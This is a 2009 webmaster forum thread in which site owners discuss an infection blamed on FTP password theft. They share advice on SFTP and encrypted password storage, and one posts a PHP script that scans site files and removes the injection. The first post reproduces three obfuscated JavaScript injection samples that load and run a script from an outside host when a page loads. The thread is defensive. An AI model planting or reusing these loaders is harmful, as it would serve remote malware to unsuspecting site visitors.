|
|
|
|
|
|
December 10th, 2009, 02:30 AM
|
#1 (permalink) |
|
I need help
Join Date: Jun 2006
Posts: 11
|
WARNING. NEW FIREZILLA HACK
hi yall
just wanted to warn you about a new hack/virus/trojan that just infected every domain that i have online on every server. basically somehow it stoled my ftp accounts ( i was using firezilla for 2 weeks now and this is when the trouble began, before that i was using cuteftp and didn't hadn't any issues until. swiched to firezilla because it seems faster...this was a huge mistake) the hack is somekind of javascript, that loads an encoded long piece of code at the bottom of every page. so far i've found this pieces of codes on infected files: Code:
script /*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl =
document.createElement('script');Jqjzlgspz98uxl.setAttribute('type',
'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src',
'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m
@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c
@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$
!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m
)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig,
''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl);}}
catch(e) {} /script
Code:
script/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 =
document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type',
'text/javascript');Hva23p3hnyirlpv7.setAttribute('id',
'myscript1');Hva23p3hnyirlpv7.setAttribute('src',
'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^
u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)
@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o
@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^
#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer',
'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}/script
Code:
script/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p =
document.createElement('script');H3qqea3ur6p.setAt tribute('type',
'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src',
'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@
.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#
$#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&
^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p
$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c
!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&
#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer',
'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}/script
I don't know yet the source of the hack and how i got infected The script tries to load some domain.ru scrip (posibile trojan). I'm trying now to clean the desktop, then contact every host to change ftp passwords and ip lock on connections. As a removal tool, hosts can do clean the files, and besides that I've found this php code that search for regular expressions and removes them. Download php removal code here original creater and instructions here if some php guru can contact me and help me modify the script (with the regulars expresions that are searched and deleted) so I can remove the code from all the infected files, please contact me asap on 175444555. I will pay you for your work. further reading on this matter can be found on this dutch thread Transation here Thank you and please be aware and check your online files now! If you're not infected backup everything cause this is spreading very fast. A week ago there were 3 pages in google on this matter...now they are over 10 and going up. |
|
|
|
December 10th, 2009, 03:52 AM
|
#2 (permalink) |
|
Guest
Join Date: Oct 2005
Location: England
Posts: 7,393
|
Can you restrict ftp logins to your IP or IP range?
__________________
I apologise to ADX members for my constant reminders that Lord Aga and Netpond are scammers Money Bookers - now with ATM withdrawals via MasterCard |
|
|
|
|
December 10th, 2009, 07:44 AM
|
#3 (permalink) |
|
Serious Contributor
Join Date: Nov 2008
Posts: 954
|
do u mean filezilla? never heard of firezilla.
__________________
 FLASHGALS - FREE TUBE/CMS SCRIPT Automatically convert FHG into your own gallery or tube 
|
|
|
|
|
December 10th, 2009, 08:20 AM
|
#4 (permalink) |
|
I need help
Join Date: Jun 2006
Posts: 11
|
filezilla sry.
here is the scan_files.php script that i'm using right now to clean files from infected domains: Code:
<?php
echo "<pre>";
set_time_limit(3600);
$exclude_files = array(
$_SERVER['DOCUMENT_ROOT'] . '/' . 'scan_files.php',
);
$exclude_dirs = array(
$_SERVER['DOCUMENT_ROOT'] . '/' . 'stats',
);
$update = $_REQUEST["u"] == "1";
$verbose = $_REQUEST["v"] == "1";
function scan_files($dir) {
global $exclude_files, $exclude_dirs, $update, $verbose;
// regular expressions to search
$exp1 = '|<script>/\*GNU GPL\*/ try\{window\.onload = function\(\){(.*)</script>|imU';
$exp2 = "</script>$";
$exp3 = "#</script>#";
$exp4 = "#<!-- ?\n\(function\(.*?\){var .*?unescape\(.*?\);\n -->#";
$exp5 = "#<!-- ?\n\(function\(.*?\){eval\(unescape\(.*?\);\n -->#";
//$search = array('|<script>/\*GNU GPL\*/|imU');
$search = array('|<script>/\*GNU GPL\*/ try\{window\.onload = function\(\){(.*)</script>|imU');
$dirs_array = array();
if ($handle = opendir($dir)) {
echo "Open dir: " . $dir . "\n";
echo "Files:";
// this is the correct way to loop over the directory.
while (false !== ($file = readdir($handle))) {
if ($file != '.' && $file != '..') {
$path = $dir . $file;
if (is_file($path)) {
// skip large files
if (filesize($path) > 1000000) {
continue;
}
// exclude files
if (in_array($path, $exclude_files)) {
continue;
}
// exclude files
if (endsWith($file, '.bak')) {
continue;
}
if (endsWith($path, '/images/image.php') ||
endsWith($path, '/images/gifimg.php')) {
echo "\n===>" . $path . "\n";
if ($update) {
unlink($path);
}
continue;
}
// get content
$contents = file_get_contents($path);
$origContents = $contents;
// loop for search string
foreach ($search as $pattern) {
$contents = preg_replace($pattern, "", $contents);
}
if ($contents != $origContents) {
echo "\n===>" . $path;
//echo "\n";
if ($update) {
//chmod($path, "ugo+rw");
/* if (!$file_handle = fopen($path . '.bak', 'w')) {
echo "Cannot open file ({$path}.bak)<br/>\n";
exit;
}
if (fwrite($file_handle, $origContents) === FALSE) {
echo "Cannot write to file ({$path}.bak)<br/>\n";
exit;
}
fclose($file_handle); */
if (!$file_handle = @fopen($path, 'w')) {
echo "\nXXX: Cannot open file ({$path})\n";
//continue;
exit;
}
if (@fwrite($file_handle, $contents) === FALSE) {
echo "\nXXX: Cannot write to file ({$path})\n";
//continue;
exit;
}
fclose($file_handle);
}
elseif ($verbose) {
echo "**********\norigContents=$origContents\n";
echo "**********\ncontents=$contents\n";
}
}
} elseif (is_dir($path)) {
if (in_array($path, $exclude_dirs)) {
continue;
}
$dirs_array[] = $path;
}
}
}
closedir($handle);
}
foreach ($dirs_array as $dir) {
scan_files($dir . '/');
}
unset($dirs_array);
}
function endsWith($string, $ending) {
$len = strlen($ending);
$string_end = substr($string, strlen($string) - $len);
return $string_end == $ending;
}
$start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';
echo 'Starting from: ' . $start_dir . "\n";
scan_files($start_dir);
?>
|
|
|
|
|
December 10th, 2009, 09:26 AM
|
#6 (permalink) |
|
Pimpin' Angel
Join Date: Sep 2008
Location: Paris, France
Posts: 668
|
How do you know you've been hit?
__________________
"Reality is wrong. Dreams are for real." Tupac Amaru Shakur (June 16th, 1971 - September 13th, 1996)
Exquisite Angelz, Home of the exquisite models, adult models & adult actresses we all fantasize! |
|
|
|
|
December 10th, 2009, 10:03 AM
|
#7 (permalink) | |
|
I need help
Join Date: Jun 2006
Posts: 11
|
Quote:
deleted the code and moved on...until i was browsing and reached one of my sites and saw that google is blocking site for malicious software...started to investigate and realized that the code is everywhere, on every domain i own. I went to mozilla and installed an add-on called noscript that blocks every script from every page you browse until you allow it to run....this is to protect while cleaning the mess. |
|
|
|
|
|
December 10th, 2009, 10:13 AM
|
#8 (permalink) |
|
I love AskDamageX.com
Join Date: Oct 2009
Posts: 70
|
This isn't anything new folks!
It's a trojan/virus that infects your desktop. It then scans your documents & settings for the files that filezilla and other common FTP programs use to store saved passwords. If your program encrypts the passwords, it can also listen to the FTP packet stream, since FTP transmits passwords in PLAIN TEXT. DO NOT USE FTP! Use SFTP (ftp over ssh) or FTPSSL to make sure your FTP connection to your server is secure and your password isn't being sent over the internet unencrypted in plain text. Make sure that any program you use, that has a "save passwords" feature, stores those passwords in an encrypted format that can't be read by malware. |
|
|
|
|
December 10th, 2009, 12:57 PM
|
#9 (permalink) | |
|
Serious Contributor
Join Date: Jan 2008
Posts: 670
|
Quote:
is that virus "special" for FILEZILLA or does that read all the info on your PC and then sends it to the "new owners"?
__________________
~~~~ My Sweet Ebony ~~~~ Asian Gay Special ~~~~ - Learn How to Make Money - Fast and Reliable Web Hosting - ICQ# 169833797 |
|
|
|
|
|
December 10th, 2009, 02:05 PM
|
#11 (permalink) | |
|
Seriously Cute
Join Date: Oct 2006
Location: Way up north!
Posts: 3,298
|
Quote:
|
|
|
|
|
|
December 10th, 2009, 02:59 PM
|
#14 (permalink) |
|
Great White North
Join Date: Jan 2009
Posts: 513
|
This is the 3rd or 4th thread I've saw with guys getting all their accounts fuxor'd by using Filezilla.
Stop using it, use a real solution.
__________________
linkspun - Premier Adult Link Trade Community - ICQ - 464/\281/\250 |
|
|
|
|
December 10th, 2009, 03:07 PM
|
#15 (permalink) |
|
I love AskDamageX.com
Join Date: Oct 2009
Posts: 70
|
Filezilla works perfectly fine, there is a setting you can toggle that will let you store your password encrypted, and you can use SFTP instead of FTP.
Personally, I run a Mac, so I use CyberDuck for my file-transfer program, and I just enter my URL's as sftp://domain.com instead of ftp://domain.com sftp uses port 22, same as SSH, and requires an SSH account, so you may need to request one for access from your host. I don't even have FTP servers installed on any of my boxes, I just simply run SSHD and use SFTP. |
|
|
|
|
December 10th, 2009, 03:11 PM
|
#16 (permalink) | |
|
I love AskDamageX.com
Join Date: Oct 2009
Posts: 70
|
Quote:
It reads the data from multiple FTP programs. I'll try to find the stuff I read about it... edit: found it: http://www.webhostingtalk.com/showthread.php?t=887539 Last edited by mBishop; December 10th, 2009 at 03:16 PM. |
|
|
|
|
|
December 10th, 2009, 05:51 PM
|
#18 (permalink) | |
|
Complete fucking amateur
Join Date: Apr 2008
Location: Out dogging
Posts: 464
|
Quote:
__________________
filthybritishporn |
|
|
|
|
|
December 11th, 2009, 04:43 AM
|
#19 (permalink) | |
|
Pimpin' Angel
Join Date: Sep 2008
Location: Paris, France
Posts: 668
|
Quote:
__________________
"Reality is wrong. Dreams are for real." Tupac Amaru Shakur (June 16th, 1971 - September 13th, 1996)
Exquisite Angelz, Home of the exquisite models, adult models & adult actresses we all fantasize! |
|
|
|
|
 |
| Thread Tools | |
|
|
